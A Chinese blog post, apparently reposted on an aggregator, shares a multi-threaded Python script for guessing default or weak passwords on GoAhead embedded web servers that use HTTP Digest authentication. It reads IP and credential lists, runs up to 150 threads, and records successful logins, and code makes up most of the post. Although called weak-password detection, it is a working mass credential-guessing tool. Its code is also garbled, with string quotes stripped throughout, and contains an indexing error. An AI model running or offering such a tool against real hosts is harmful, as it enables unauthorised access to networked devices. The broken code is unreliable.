批量检测GoAhead系列服务器中Digest认证方式的服务器弱口令

Posted rngorgeous

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了批量检测GoAhead系列服务器中Digest认证方式的服务器弱口令相关的知识,希望对你有一定的参考价值。

  最近在学习用python写爬虫工具,某天偶然发现GoAhead系列服务器的登录方式跟大多数网站不一样,不是采用POST等方法,通过查找资料发现GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的嵌入式Web Server。大多数GoAhead服务器采用了HTTP Digest认证方式,并且部分服务器采用了默认账号密码,于是萌生了针对GoAhead编写爬虫的想法,通过近8个小时的编程与调试,勉强写出了个简陋的脚本,现在拿出来分享,给刚接触python的新手参考下,也请求路过的大神指点下,哈哈。

  该脚本对新手来说难点在于如何让python自动填写账号密码并登录,本人花了近两个小时参考了很多网站,觉得用python的第三方模块requests中的get()函数最方便,只需填写URL、认证方式和账号密码即可模拟登录。

  另一个难点就是多线程了,不过对于用其它语言写过多线程的人来说还是挺容易的,不懂的可以自己查资料,这里就不多说了。

  下面附上完整代码:

from requests.auth import HTTPDigestAuth
import requests
import threading
import sys
import os
import time


ip_file_name = ip.txt
password_file_name = password.txt
results_file_name = results.txt
ip_count = 0
thread_count = 0
default_thread_count = 150
local = threading.local()

#read ip_file
def get_ip():
    if os.path.exists(os.getcwd() + / + ip_file_name):
        with open(ip_file_name, r) as r:
            list = []
            for line in r.readlines():
                line = line.strip(\n)
                line = http:// + line
                list.append(line)
            r.close()
            return list
    else:
        print(ip file doesn\‘t exist!\n)
        os._exit(-1)

#read password_file
def get_password():
    if os.path.exists(os.getcwd() + / + password_file_name):
        with open(password_file_name, r) as pa:
            list = []
            for line in pa.readlines():
                line = line.strip(\n)
                list.append(line)
            pa.close()
        return list
    else:
        print(password file doesn\‘t exist!\n)
        os._exit(-1)

class MyThread(threading.Thread):
    def __init__(self, thread_index, ip_list, pass_list, results_file):
        threading.Thread.__init__(self)
        self.thread_index = thread_index
        self.ip_list = ip_list
        self.pass_list = pass_list
        self.results_file = results_file
    
    def run(self):
        local.thread_index = self.thread_index
        #Calculate the number of tasks assigned.
        if ip_count <= default_thread_count:
            local.my_number = 1
        else:
            local.my_number = (int)(ip_count/thread_count)
            if ip_count%thread_count > thread_index:
                local.my_number = local.my_number + 1
        
        for local.times in range(local.my_number):
            try:
                local.ip = self.ip_list[(local.times-1)*thread_count+local.thread_index]
                #Check whether the target is a digest authentication.
                local.headers = str(requests.get(local.ip, timeout=6).headers)
                if Digest not in local.headers:
                    continue
            except BaseException:
                ‘‘‘
                e = sys.exc_info()
                print(e)
                ‘‘‘
                continue
            #Loop to submit account password.
            for local.user in self.pass_list:
                #sleep 0.1 second to prevent overloading of target
                time.sleep(0.1)
                #Get the account password by cutting local.user
                local.colon_index = local.user.find(:)
                if local.colon_index == -1:
                    print(local.user+ doesn\‘t Conform to the specifications)
                    os._exit(1)
                local.username = local.user[0:local.colon_index]
                local.password = local.user[local.colon_index+1:]
                if local.password == <empty>:
                    local.password = ‘‘
                try:
                    local.timeouts = 0
                    #Start Digest authentication
                    local.code = requests.get( local.ip, auth=HTTPDigestAuth(local.username, local.password), timeout=5 )
                    #If the status code is 200,the login is success 
                    if local.code.status_code == 200 :
                        print(login +local.ip+ success!)
                        self.results_file.writelines(local.ip+ +local.username+ +local.password+\n)
                        break
                except BaseException:
                        ‘‘‘
                        e = sys.exc_info()
                        print(str(local.thread_index)+‘ ‘+local.ip+‘ ‘+local.username+‘ ‘+local.password)
                        print(e)
                        ‘‘‘
                        #If the times of timeout is too many, check the next IP.
                        local.timeouts += 1
                        if local.timeouts == 15:
                            local.timeouts = 0
                            break
                        else:
                            continue

if __name__ == __main__:
    
    ip_list = get_ip()
    pass_list = get_password()
    
    if len(ip_list)==0 or len(pass_list)==0:
        print(please fill ip, username or password file)
        os._exit(-1)
    
    ip_count = len(ip_list)
    if ip_count <= default_thread_count:
        thread_count = ip_count
    else:
        thread_count = default_thread_count
    
    print(start to work...)
    #create threads and run
    threads = []
    with open(results_file_name, mode=a) as results_file:
        for thread_index in range(thread_count):
            thread = MyThread(thread_index, ip_list, pass_list, results_file)
            thread.start()
            threads.append(thread)
        for thread in threads:
            #wait for all threads to end
            thread.join()
        results_file.close()
    
    print(All work has been completed.)

  该脚本的运行流程为:

  1.读取ip.txt、password.txt文件中的内容

  2.创建线程并运行

  3.每个线程对其分配到的IP进行循环认证,先检查目标是否存在且为Digest认证方式,若为真则开始循环登录,登录过程中若多次超时则跳过对该IP的检查

  4.当服务器返回200状态码时则表示登录成功,将IP和账号密码写入results.txt,并循环检查下一个IP

  5.当所有线程将分配到的所有IP检查完毕,则程序运行完毕

以上是关于批量检测GoAhead系列服务器中Digest认证方式的服务器弱口令的主要内容,如果未能解决你的问题,请参考以下文章

HTTP认证模式:Basic & Digest

HTTP Digest认证

http digest鉴权

WEB认证模式:Basic & Digest

http协议之digest(摘要)认证,详细讲解并附Java SpringBoot源码

http协议之digest(摘要)认证,详细讲解并附Java SpringBoot源码